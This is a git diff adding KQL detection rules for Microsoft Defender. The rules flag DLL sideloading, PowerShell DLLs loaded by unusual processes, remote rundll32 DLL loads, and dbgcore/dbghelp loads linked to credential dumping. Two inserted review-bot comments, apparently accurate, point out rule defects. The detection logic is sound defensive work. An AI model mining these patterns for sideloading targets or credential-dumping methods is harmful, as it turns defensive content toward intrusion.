"\\loadperf.dll" or FolderPath endswith "\\lockhostingframework.dll" or FolderPath endswith "\\logoncli.dll" or FolderPath endswith "\\logoncontroller.dll" or FolderPath endswith "\\lpksetupproxyserv.dll" or FolderPath endswith "\\lrwizdll.dll" or FolderPath endswith "\\magnification.dll" or FolderPath endswith "\\maintenanceui.dll" or FolderPath endswith "\\mapistub.dll" or FolderPath endswith "\\mbaexmlparser.dll" or FolderPath endswith "\\mdmdiagnostics.dll" or FolderPath endswith "\\mfc42u.dll" or FolderPath endswith "\\mfcore.dll" or FolderPath endswith "\\mfplat.dll" or FolderPath endswith "\\mi.dll" or FolderPath endswith "\\midimap.dll" or FolderPath endswith 
"\\mintdh.dll" or FolderPath endswith "\\miutils.dll" or FolderPath endswith "\\mlang.dll" or FolderPath endswith "\\mmdevapi.dll" or FolderPath endswith "\\mobilenetworking.dll" or FolderPath endswith "\\mpr.dll" or FolderPath endswith "\\mprapi.dll" or FolderPath endswith "\\mrmcorer.dll" or FolderPath endswith "\\msacm32.dll" or FolderPath endswith "\\mscms.dll" or FolderPath endswith "\\mscoree.dll" or FolderPath endswith "\\msctf.dll" or FolderPath endswith "\\msctfmonitor.dll" or FolderPath endswith "\\msdrm.dll" or FolderPath endswith "\\msdtctm.dll" or FolderPath endswith "\\msftedit.dll" or FolderPath endswith "\\msi.dll" or FolderPath endswith "\\msiso.dll" or FolderPath endswith "\\msutb.dll" or FolderPath endswith "\\msvcp110_win.dll" or FolderPath endswith "\\mswb7.dll" or FolderPath endswith "\\mswsock.dll" or FolderPath endswith "\\msxml3.dll" or FolderPath endswith "\\mtxclu.dll" or FolderPath endswith "\\napinsp.dll" or FolderPath endswith "\\ncrypt.dll" or FolderPath endswith "\\ndfapi.dll" or FolderPath endswith "\\netapi32.dll" or FolderPath endswith "\\netid.dll" or FolderPath endswith "\\netiohlp.dll" or FolderPath endswith "\\netjoin.dll" or FolderPath endswith "\\netplwiz.dll" or FolderPath endswith "\\netprofm.dll" or FolderPath endswith "\\netprovfw.dll" or FolderPath endswith "\\netsetupapi.dll" or FolderPath endswith "\\netshell.dll" or FolderPath endswith "\\nettrace.dll" or FolderPath endswith "\\netutils.dll" or FolderPath endswith "\\networkexplorer.dll" or FolderPath endswith "\\newdev.dll" or FolderPath endswith "\\ninput.dll" or FolderPath endswith "\\nlaapi.dll" or FolderPath endswith "\\nlansp_c.dll" or FolderPath endswith "\\npmproxy.dll" or FolderPath endswith "\\nshhttp.dll" or FolderPath endswith "\\nshipsec.dll" or FolderPath endswith "\\nshwfp.dll" or FolderPath endswith "\\ntdsapi.dll" or FolderPath endswith "\\ntlanman.dll" or FolderPath endswith "\\ntlmshared.dll" or FolderPath endswith "\\ntmarta.dll" or FolderPath 
endswith "\\ntshrui.dll" or FolderPath endswith "\\oleacc.dll" or FolderPath endswith "\\omadmapi.dll" or FolderPath endswith "\\onex.dll" or FolderPath endswith "\\opcservices.dll" or FolderPath endswith "\\osbaseln.dll" or FolderPath endswith "\\osksupport.dll" or FolderPath endswith "\\osuninst.dll" or FolderPath endswith "\\p2p.dll" or FolderPath endswith "\\p2pnetsh.dll" or FolderPath endswith "\\p9np.dll" or FolderPath endswith "\\pcaui.dll" or FolderPath endswith "\\pdh.dll" or FolderPath endswith "\\peerdistsh.dll" or FolderPath endswith "\\pkeyhelper.dll" or FolderPath endswith "\\pla.dll" or FolderPath endswith "\\playsndsrv.dll" or FolderPath endswith "\\pnrpnsp.dll" or FolderPath endswith "\\policymanager.dll" or FolderPath endswith "\\polstore.dll" or FolderPath endswith "\\powrprof.dll" or FolderPath endswith "\\printui.dll" or FolderPath endswith "\\prntvpt.dll" or FolderPath endswith "\\profapi.dll" or FolderPath endswith "\\propsys.dll" or FolderPath endswith "\\proximitycommon.dll" or FolderPath endswith "\\proximityservicepal.dll" or FolderPath endswith "\\prvdmofcomp.dll" or FolderPath endswith "\\puiapi.dll" or FolderPath endswith "\\radcui.dll" or FolderPath endswith "\\rasapi32.dll" or FolderPath endswith "\\rasdlg.dll" or FolderPath endswith "\\rasgcw.dll" or FolderPath endswith "\\rasman.dll" or FolderPath endswith "\\rasmontr.dll" or FolderPath endswith "\\reagent.dll" or FolderPath endswith "\\regapi.dll" or FolderPath endswith "\\reseteng.dll" or FolderPath endswith "\\resetengine.dll" or FolderPath endswith "\\resutils.dll" or FolderPath endswith "\\rmclient.dll" or FolderPath endswith "\\rpcnsh.dll" or FolderPath endswith "\\rsaenh.dll" or FolderPath endswith "\\rtutils.dll" or FolderPath endswith "\\rtworkq.dll" or FolderPath endswith "\\samcli.dll" or FolderPath endswith "\\samlib.dll" or FolderPath endswith "\\sapi_onecore.dll" or FolderPath endswith "\\sas.dll" or FolderPath endswith "\\scansetting.dll" or FolderPath endswith 
"\\scecli.dll" or FolderPath endswith "\\schedcli.dll" or FolderPath endswith "\\secur32.dll" or FolderPath endswith "\\security.dll" or FolderPath endswith "\\sensapi.dll" or FolderPath endswith "\\shell32.dll" or FolderPath endswith "\\shfolder.dll" or FolderPath endswith "\\slc.dll" or FolderPath endswith "\\snmpapi.dll" or FolderPath endswith "\\spectrumsyncclient.dll" or FolderPath endswith "\\spp.dll" or FolderPath endswith "\\sppc.dll" or FolderPath endswith "\\sppcext.dll" or FolderPath endswith "\\srclient.dll" or FolderPath endswith "\\srcore.dll" or FolderPath endswith "\\srmtrace.dll" or FolderPath endswith "\\srpapi.dll" or FolderPath endswith "\\srvcli.dll" or FolderPath endswith "\\ssp_isv.exe_rsaenh.dll" or FolderPath endswith "\\ssp.exe_rsaenh.dll" or FolderPath endswith "\\sspicli.dll" or FolderPath endswith "\\ssshim.dll" or FolderPath endswith "\\staterepository.core.dll" or FolderPath endswith "\\structuredquery.dll" or FolderPath endswith "\\sxshared.dll" or FolderPath endswith "\\systemsettingsthresholdadminflowui.dll" or FolderPath endswith "\\tapi32.dll" or FolderPath endswith "\\tbs.dll" or FolderPath endswith "\\tdh.dll" or FolderPath endswith "\\textshaping.dll" or FolderPath endswith "\\timesync.dll" or FolderPath endswith "\\tpmcoreprovisioning.dll" or FolderPath endswith "\\tquery.dll" or FolderPath endswith "\\tsworkspace.dll" or FolderPath endswith "\\ttdrecord.dll" or FolderPath endswith "\\twext.dll" or FolderPath endswith "\\twinapi.dll" or FolderPath endswith "\\twinui.appcore.dll" or FolderPath endswith "\\uianimation.dll" or FolderPath endswith "\\uiautomationcore.dll" or FolderPath endswith "\\uireng.dll" or FolderPath endswith "\\uiribbon.dll" or FolderPath endswith "\\umpdc.dll" or FolderPath endswith "\\unattend.dll" or FolderPath endswith "\\updatepolicy.dll" or FolderPath endswith "\\upshared.dll" or FolderPath endswith "\\urlmon.dll" or FolderPath endswith "\\userenv.dll" or FolderPath endswith "\\utildll.dll" or 
FolderPath endswith "\\uxinit.dll" or FolderPath endswith "\\uxtheme.dll" or FolderPath endswith "\\vaultcli.dll" or FolderPath endswith "\\vdsutil.dll" or FolderPath endswith "\\version.dll" or FolderPath endswith "\\virtdisk.dll" or FolderPath endswith "\\vssapi.dll" or FolderPath endswith "\\vsstrace.dll" or FolderPath endswith "\\wbemprox.dll" or FolderPath endswith "\\wbemsvc.dll" or FolderPath endswith "\\wcmapi.dll" or FolderPath endswith "\\wcnnetsh.dll" or FolderPath endswith "\\wdi.dll" or FolderPath endswith "\\wdscore.dll" or FolderPath endswith "\\webservices.dll" or FolderPath endswith "\\wecapi.dll" or FolderPath endswith "\\wer.dll" or FolderPath endswith "\\wevtapi.dll" or FolderPath endswith "\\whhelper.dll" or FolderPath endswith "\\wimgapi.dll" or FolderPath endswith "\\winbio.dll" or FolderPath endswith "\\winbrand.dll" or FolderPath endswith "\\windows.storage.dll" or FolderPath endswith "\\windows.storage.search.dll" or FolderPath endswith "\\windows.ui.immersive.dll" or FolderPath endswith "\\windowscodecs.dll" or FolderPath endswith "\\windowscodecsext.dll" or FolderPath endswith "\\windowsudk.shellcommon.dll" or FolderPath endswith "\\winhttp.dll" or FolderPath endswith "\\wininet.dll" or FolderPath endswith "\\winipsec.dll" or FolderPath endswith "\\winmde.dll" or FolderPath endswith "\\winmm.dll" or FolderPath endswith "\\winnsi.dll" or FolderPath endswith "\\winrnr.dll" or FolderPath endswith "\\winscard.dll" or FolderPath endswith "\\winsqlite3.dll" or FolderPath endswith "\\winsta.dll" or FolderPath endswith "\\winsync.dll" or FolderPath endswith "\\wkscli.dll" or FolderPath endswith "\\wlanapi.dll" or FolderPath endswith "\\wlancfg.dll" or FolderPath endswith "\\wldp.dll" or FolderPath endswith "\\wlidprov.dll" or FolderPath endswith "\\wmiclnt.dll" or FolderPath endswith "\\wmidcom.dll" or FolderPath endswith "\\wmiutils.dll" or FolderPath endswith "\\wmpdui.dll" or FolderPath endswith "\\wmsgapi.dll" or FolderPath endswith 
"\\wofutil.dll" or FolderPath endswith "\\wpdshext.dll" or FolderPath endswith "\\wscapi.dll" or FolderPath endswith "\\wsdapi.dll" or FolderPath endswith "\\wshbth.dll" or FolderPath endswith "\\wshelper.dll" or FolderPath endswith "\\wsmsvc.dll" or FolderPath endswith "\\wtsapi32.dll" or FolderPath endswith "\\wwancfg.dll" or FolderPath endswith "\\wwapi.dll" or FolderPath endswith "\\xmllite.dll" or FolderPath endswith "\\xolehlp.dll" or FolderPath endswith "\\xpsservices.dll" or FolderPath endswith "\\xwizards.dll" or FolderPath endswith "\\xwtpw32.dll" or FolderPath endswith "\\amsi.dll" or FolderPath endswith "\\appraiser.dll" or FolderPath endswith "\\COMRES.DLL" or FolderPath endswith "\\cryptnet.dll" or FolderPath endswith "\\DispBroker.dll" or FolderPath endswith "\\dsound.dll" or FolderPath endswith "\\dxilconv.dll" or FolderPath endswith "\\FxsCompose.dll" or FolderPath endswith "\\FXSRESM.DLL" or FolderPath endswith "\\msdtcVSp1res.dll" or FolderPath endswith "\\PrintIsolationProxy.dll" or FolderPath endswith "\\rdpendp.dll" or FolderPath endswith "\\rpchttp.dll" or FolderPath endswith "\\storageusage.dll" or FolderPath endswith "\\utcutil.dll" or FolderPath endswith "\\WfsR.dll" or FolderPath endswith "\\igd10iumd64.dll" or FolderPath endswith "\\igd12umd64.dll" or FolderPath endswith "\\igdumdim64.dll" or FolderPath endswith "\\igdusc64.dll" or FolderPath endswith "\\TSMSISrv.dll" or FolderPath endswith "\\TSVIPSrv.dll" or FolderPath endswith "\\wbemcomn.dll" or FolderPath endswith "\\WLBSCTRL.dll" or FolderPath endswith "\\wow64log.dll" or FolderPath endswith "\\WptsExtensions.dll") and (not(((FolderPath endswith "\\version.dll" and FolderPath startswith "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\") or (FolderPath endswith "\\d3dx9_43.dll" and FolderPath startswith "C:\\Program Files\\WindowsApps\\Microsoft.DirectXRuntime_") or (FolderPath endswith "\\cscui.dll" and FolderPath startswith "C:\\Windows\\Microsoft.NET\\") or (FolderPath 
contains "C:\\$WINDOWS.~BT\\" or FolderPath contains "C:\\$WinREAgent\\" or FolderPath contains "C:\\Windows\\SoftwareDistribution\\" or FolderPath contains "C:\\Windows\\System32\\" or FolderPath contains "C:\\Windows\\SystemTemp\\" or FolderPath contains "C:\\Windows\\SysWOW64\\" or FolderPath contains "C:\\Windows\\WinSxS\\" or FolderPath contains "C:\\Windows\\SyChpe32\\") or (FolderPath startswith "C:\\Windows\\Temp\\" and (InitiatingProcessFolderPath endswith "\\TiWorker.exe" or InitiatingProcessFolderPath endswith "\\wuaucltcore.exe") and (InitiatingProcessFolderPath startswith "C:\\Windows\\WinSxS\\arm64" or InitiatingProcessFolderPath startswith "C:\\Windows\\UUS\\arm64\\"))))) and (not((((FolderPath endswith "\\mi.dll" or FolderPath endswith "\\miutils.dl") and FolderPath startswith "C:\\Program Files\\Arsenal-Image-Mounter-") or FolderPath startswith "C:\\Packages\\Plugins\\Microsoft.GuestConfiguration.ConfigurationforWindows\\" or (FolderPath endswith "\\PolicyManager.dll" and (FolderPath startswith "C:\\Program Files\\CheckPoint\\" or FolderPath startswith "C:\\Program Files (x86)\\CheckPoint\\") and InitiatingProcessFolderPath endswith "\\SmartConsole.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\CheckPoint\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\CheckPoint\\")) or (FolderPath startswith "C:\\Program Files\\WindowsApps\\DellInc.DellSupportAssistforPCs" and (InitiatingProcessFolderPath contains "C:\\Program Files\\WindowsApps\\DellInc.DellSupportAssistforPCs" or InitiatingProcessFolderPath contains "C:\\Windows\\System32\\backgroundTaskHost.exe")) or (InitiatingProcessFolderPath endswith "\\wldp.dll" and InitiatingProcessFolderPath startswith "C:\\Program Files\\WindowsApps\\DellInc.DellSupportAssistforPCs") or (FolderPath endswith "\\mswb7.dll" and FolderPath startswith "C:\\Program Files\\Microsoft\\Exchange Server\\") or (InitiatingProcessFolderPath =~ "C:\\Program Files\\Common Files\\microsoft 
shared\\ClickToRun\\OfficeClickToRun.exe" and FolderPath =~ "C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVPolicy.dll"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/potential_vivaldi_elf_dll_sideloading.kql b/KQL/rules/windows/image_load/potential_vivaldi_elf_dll_sideloading.kql
new file mode 100644
index 00000000..88457514
--- /dev/null
+++ b/KQL/rules/windows/image_load/potential_vivaldi_elf_dll_sideloading.kql
@@ -0,0 +1,10 @@
+// Title: Potential Vivaldi_elf.DLL Sideloading
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-08-03
+// Level: medium
+// Description: Detects potential DLL sideloading of "vivaldi_elf.dll"
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\vivaldi_elf.dll" and (not((FolderPath contains "\\Vivaldi\\Application\\" and InitiatingProcessFolderPath endswith "\\Vivaldi\\Application\\vivaldi.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/potential_waveedit_dll_sideloading.kql b/KQL/rules/windows/image_load/potential_waveedit_dll_sideloading.kql
new file mode 100644
index 00000000..5b2c2e23
--- /dev/null
+++ b/KQL/rules/windows/image_load/potential_waveedit_dll_sideloading.kql
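Review bot: The Arsenal Image Mounter exclusion near the end of the system-DLL where clause tests `FolderPath endswith "\\miutils.dl"` — the final `l` is missing, so that clause never matches a loaded miutils.dll and the filter is only effective for mi.dll; it should read `FolderPath endswith "\\miutils.dll"`. The same exclusion block also contains `InitiatingProcessFolderPath endswith "\\wldp.dll"`, which compares a process path against a DLL name and looks like a mis-mapped field; presumably the source rule meant the loaded image, so this is worth checking against the upstream rule before the next automated run overwrites the file. The where clause begins at the hunk header several lines earlier and is one very long line, so both defects are easy to miss in review.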
@@ -0,0 +1,12 @@
+// Title: Potential Waveedit.DLL Sideloading
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-06-14
+// Level: high
+// Description: Detects potential DLL sideloading of "waveedit.dll", which is part of the Nero WaveEditor audio editing software.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001
+// False Positives:
+// - Unlikely
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\waveedit.dll" and (not(((InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Nero\\Nero Apps\\Nero WaveEditor\\waveedit.exe", "C:\\Program Files\\Nero\\Nero Apps\\Nero WaveEditor\\waveedit.exe")) and (FolderPath startswith "C:\\Program Files (x86)\\Nero\\Nero Apps\\Nero WaveEditor\\" or FolderPath startswith "C:\\Program Files\\Nero\\Nero Apps\\Nero WaveEditor\\"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/potential_wazuh_security_platform_dll_sideloading.kql b/KQL/rules/windows/image_load/potential_wazuh_security_platform_dll_sideloading.kql
new file mode 100644
index 00000000..37b7fd37
--- /dev/null
+++ b/KQL/rules/windows/image_load/potential_wazuh_security_platform_dll_sideloading.kql
@@ -0,0 +1,12 @@
+// Title: Potential Wazuh Security Platform DLL Sideloading
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-03-13
+// Level: medium
+// Description: Detects potential DLL side loading of DLLs that are part of the Wazuh security platform
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001
+// False Positives:
+// - Many legitimate applications leverage this DLL. (Visual Studio, JetBrains, Ruby, Anaconda, GithubDesktop, etc.)
+
+DeviceImageLoadEvents
+| where (FolderPath endswith "\\libwazuhshared.dll" or FolderPath endswith "\\libwinpthread-1.dll") and (not((FolderPath startswith "C:\\Program Files\\" or FolderPath startswith "C:\\Program Files (x86)\\"))) and (not(((FolderPath contains "\\AppData\\Local\\" or FolderPath contains "\\ProgramData\\") and FolderPath endswith "\\mingw64\\bin\\libwinpthread-1.dll")))
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/potential_wwlib_dll_sideloading.kql b/KQL/rules/windows/image_load/potential_wwlib_dll_sideloading.kql
new file mode 100644
index 00000000..cdc912b1
--- /dev/null
+++ b/KQL/rules/windows/image_load/potential_wwlib_dll_sideloading.kql
@@ -0,0 +1,10 @@
+// Title: Potential WWlib.DLL Sideloading
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-05-18
+// Level: medium
+// Description: Detects potential DLL sideloading of "wwlib.dll"
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\wwlib.dll" and (not(((FolderPath startswith "C:\\Program Files (x86)\\Microsoft Office\\" or FolderPath startswith "C:\\Program Files\\Microsoft Office\\") and InitiatingProcessFolderPath endswith "\\winword.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft Office\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft Office\\"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/potentially_suspicious_volume_shadow_copy_vsstrace_dll_load.kql b/KQL/rules/windows/image_load/potentially_suspicious_volume_shadow_copy_vsstrace_dll_load.kql
new file mode 100644
index 00000000..8b175607
--- /dev/null
+++ b/KQL/rules/windows/image_load/potentially_suspicious_volume_shadow_copy_vsstrace_dll_load.kql
@@ -0,0 +1,10 @@
+// Title: Potentially Suspicious Volume Shadow Copy Vsstrace.dll Load
+// Author: frack113
+// Date: 2023-02-17
+// Level: medium
+// Description: Detects the image load of VSS DLL by uncommon executables
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.impact, attack.t1490
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\vsstrace.dll" and (not((isnull(InitiatingProcessFolderPath) or (InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\") or ((InitiatingProcessFolderPath in~ ("C:\\Windows\\explorer.exe", "C:\\Windows\\ImmersiveControlPanel\\SystemSettings.exe")) or (InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\Temp\\{" or InitiatingProcessFolderPath startswith "C:\\Windows\\WinSxS\\" or InitiatingProcessFolderPath startswith "C:\\ProgramData\\Package Cache\\{"))))) and (not(((InitiatingProcessFolderPath contains "\\temp\\is-" and InitiatingProcessFolderPath contains "\\avira_system_speedup.tmp") or InitiatingProcessFolderPath startswith "C:\\$WinREAgent\\Scratch\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/powershell_core_dll_loaded_by_non_powershell_process.kql b/KQL/rules/windows/image_load/powershell_core_dll_loaded_by_non_powershell_process.kql
new file mode 100644
index 00000000..87303c9b
--- /dev/null
+++ b/KQL/rules/windows/image_load/powershell_core_dll_loaded_by_non_powershell_process.kql
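Review bot: The `isnull(InitiatingProcessFolderPath)` branch of the exclusion in the `| where` line only matches a true null; if Advanced Hunting delivers a missing initiating image as an empty string, which is common for string columns in DeviceImageLoadEvents, that branch never fires and every load with an unknown initiating process falls through as an alert. `isempty(InitiatingProcessFolderPath)` covers both null and the empty string and is the safer rendering of the Sigma null filter, so the line would read `... (not((isempty(InitiatingProcessFolderPath) or ...`. The same construct appears in the "PowerShell Core DLL Loaded By Non PowerShell Process", "Python Image Load By Non-Python Process", "Suspicious Volume Shadow Copy VSS_PS.dll Load", "Suspicious Volume Shadow Copy Vssapi.dll Load" and "Suspicious WSMAN Provider Image Loads" rules in this diff. Since these files are emitted by the conversion step, the change belongs in the converter's null-field mapping rather than in the generated KQL.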
@@ -0,0 +1,14 @@
+// Title: PowerShell Core DLL Loaded By Non PowerShell Process
+// Author: Tom Kern, oscd.community, Natalia Shornikova, Tim Shelton, Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
+// Date: 2019-11-14
+// Level: medium
+// Description: Detects loading of essential DLLs used by PowerShell by non-PowerShell process.
+// Detects behavior similar to meterpreter's "load powershell" extension.
+// MITRE Tactic: Execution
+// Tags: attack.t1059.001, attack.execution
+// False Positives:
+// - Used by some .NET binaries, minimal on user workstation.
+// - Used by Microsoft SQL Server Management Studio
+
+DeviceImageLoadEvents
+| where (InitiatingProcessVersionInfoFileDescription =~ "System.Management.Automation" or InitiatingProcessVersionInfoOriginalFileName =~ "System.Management.Automation.dll" or (FolderPath endswith "\\System.Management.Automation.dll" or FolderPath endswith "\\System.Management.Automation.ni.dll")) and (not(((InitiatingProcessFolderPath endswith "\\mscorsvw.exe" and (InitiatingProcessFolderPath startswith "C:\\Windows\\Microsoft.NET\\Framework\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\Microsoft.NET\\FrameworkArm\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\Microsoft.NET\\FrameworkArm64\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\Microsoft.NET\\Framework64\\")) or (InitiatingProcessFolderPath in~ ("C:\\Windows\\System32\\dsac.exe", "C:\\WINDOWS\\System32\\RemoteFXvGPUDisablement.exe", "C:\\Windows\\System32\\runscripthelper.exe", "C:\\WINDOWS\\System32\\sdiagnhost.exe", "C:\\Windows\\System32\\ServerManager.exe", "C:\\Windows\\System32\\SyncAppvPublishingServer.exe", "C:\\Windows\\System32\\winrshost.exe", "C:\\Windows\\System32\\wsmprovhost.exe", "C:\\Windows\\SysWOW64\\winrshost.exe", "C:\\Windows\\SysWOW64\\wsmprovhost.exe")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\PowerShell\\7-preview\\pwsh.exe", "C:\\Program Files\\PowerShell\\7\\pwsh.exe", "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe", "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell_ise.exe", "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe")) or ((InitiatingProcessFolderPath contains "C:\\Program Files\\WindowsApps\\Microsoft.PowerShellPreview" or InitiatingProcessFolderPath contains "\\AppData\\Local\\Microsoft\\WindowsApps\\Microsoft.PowerShellPreview") and InitiatingProcessFolderPath endswith "\\pwsh.exe")))) and (not((isnull(InitiatingProcessFolderPath) or InitiatingProcessFolderPath startswith "C:\\ProgramData\\chocolatey\\choco.exe" or InitiatingProcessFolderPath endswith "\\Citrix\\ConfigSync\\ConfigSyncRun.exe" or ((InitiatingProcessFolderPath endswith "\\thor64.exe" or InitiatingProcessFolderPath endswith "\\thor.exe") and InitiatingProcessFolderPath startswith "C:\\Windows\\Temp\\asgard2-agent\\") or (InitiatingProcessFolderPath endswith "\\IDE\\Ssms.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft SQL Server Management Studio" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft SQL Server Management Studio")) or (InitiatingProcessFolderPath endswith "\\Tools\\Binn\\SQLPS.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft SQL Server\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft SQL Server\\")) or (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft Visual Studio\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft Visual Studio\\"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/powershell_core_dll_loaded_via_office_application.kql b/KQL/rules/windows/image_load/powershell_core_dll_loaded_via_office_application.kql
new file mode 100644
index 00000000..75f7bca4
--- /dev/null
+++ b/KQL/rules/windows/image_load/powershell_core_dll_loaded_via_office_application.kql
@@ -0,0 +1,10 @@
+// Title: PowerShell Core DLL Loaded Via Office Application
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-06-01
+// Level: medium
+// Description: Detects PowerShell core DLL being loaded by an Office Product
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceImageLoadEvents
+| where (FolderPath contains "\\System.Management.Automation.Dll" or FolderPath contains "\\System.Management.Automation.ni.Dll") and (InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\mspub.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\onenote.exe" or InitiatingProcessFolderPath endswith "\\onenoteim.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\winword.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/python_image_load_by_non_python_process.kql b/KQL/rules/windows/image_load/python_image_load_by_non_python_process.kql
new file mode 100644
index 00000000..b927676d
--- /dev/null
+++ b/KQL/rules/windows/image_load/python_image_load_by_non_python_process.kql
@@ -0,0 +1,16 @@
+// Title: Python Image Load By Non-Python Process
+// Author: Patrick St. John, OTR (Open Threat Research)
+// Date: 2020-05-03
+// Level: low
+// Description: Detects the image load of "Python Core" by a non-Python process. This might be indicative of a execution of executable that has been bundled from Python code.
+// Various tools like Py2Exe, PyInstaller, and cx_Freeze are used to bundle Python code into standalone executables.
+// Threat actors often use these tools to bundle malicious Python scripts into executables, sometimes to obfuscate the code or to bypass security measures.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027.002
+// False Positives:
+// - Legitimate Py2Exe Binaries
+// - Known false positive caused with Python Anaconda
+// - Various legitimate software is bundled from Python code into executables
+
+DeviceImageLoadEvents
+| where InitiatingProcessVersionInfoFileDescription =~ "Python Core" and (not((InitiatingProcessFolderPath contains "Python" or (InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\ProgramData\\Anaconda3\\")))) and (not(isnull(InitiatingProcessFolderPath)))
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/remote_dll_load_via_rundll32_exe.kql b/KQL/rules/windows/image_load/remote_dll_load_via_rundll32_exe.kql
new file mode 100644
index 00000000..df73b109
--- /dev/null
+++ b/KQL/rules/windows/image_load/remote_dll_load_via_rundll32_exe.kql
@@ -0,0 +1,10 @@
+// Title: Remote DLL Load Via Rundll32.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-09-18
+// Level: medium
+// Description: Detects a remote DLL load event via "rundll32.exe".
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1204.002
+
+DeviceImageLoadEvents
+| where FolderPath startswith "\\\\" and InitiatingProcessFolderPath endswith "\\rundll32.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/suspicious_loading_of_dbgcore_dbghelp_dlls_from_uncommon_location.kql b/KQL/rules/windows/image_load/suspicious_loading_of_dbgcore_dbghelp_dlls_from_uncommon_location.kql
new file mode 100644
index 00000000..598ad00e
--- /dev/null
+++ b/KQL/rules/windows/image_load/suspicious_loading_of_dbgcore_dbghelp_dlls_from_uncommon_location.kql
@@ -0,0 +1,13 @@
+// Title: Suspicious Loading of Dbgcore/Dbghelp DLLs from Uncommon Location
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-11-27
+// Level: high
+// Description: Detects loading of dbgcore.dll or dbghelp.dll from uncommon locations such as user directories.
+// These DLLs contain the MiniDumpWriteDump function, which can be abused for credential dumping purposes or in some cases for evading EDR/AV detection by suspending processes.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003, attack.defense-evasion, attack.t1562.001
+// False Positives:
+// - Possibly during software installation or update processes
+
+DeviceImageLoadEvents
+| where (FolderPath endswith "\\dbgcore.dll" or FolderPath endswith "\\dbghelp.dll") and (InitiatingProcessFolderPath contains ":\\Perflogs\\" or InitiatingProcessFolderPath contains ":\\Temp\\" or InitiatingProcessFolderPath contains ":\\Users\\Public\\" or InitiatingProcessFolderPath contains "\\$Recycle.Bin\\" or InitiatingProcessFolderPath contains "\\Contacts\\" or InitiatingProcessFolderPath contains "\\Desktop\\" or InitiatingProcessFolderPath contains "\\Documents\\" or InitiatingProcessFolderPath contains "\\Downloads\\" or InitiatingProcessFolderPath contains "\\Favorites\\" or InitiatingProcessFolderPath contains "\\Favourites\\" or InitiatingProcessFolderPath contains "\\inetpub\\wwwroot\\" or InitiatingProcessFolderPath contains "\\Music\\" or InitiatingProcessFolderPath contains "\\Pictures\\" or InitiatingProcessFolderPath contains "\\Start Menu\\Programs\\Startup\\" or InitiatingProcessFolderPath contains "\\Users\\Default\\" or InitiatingProcessFolderPath contains "\\Videos\\")
\ No newline at end of file
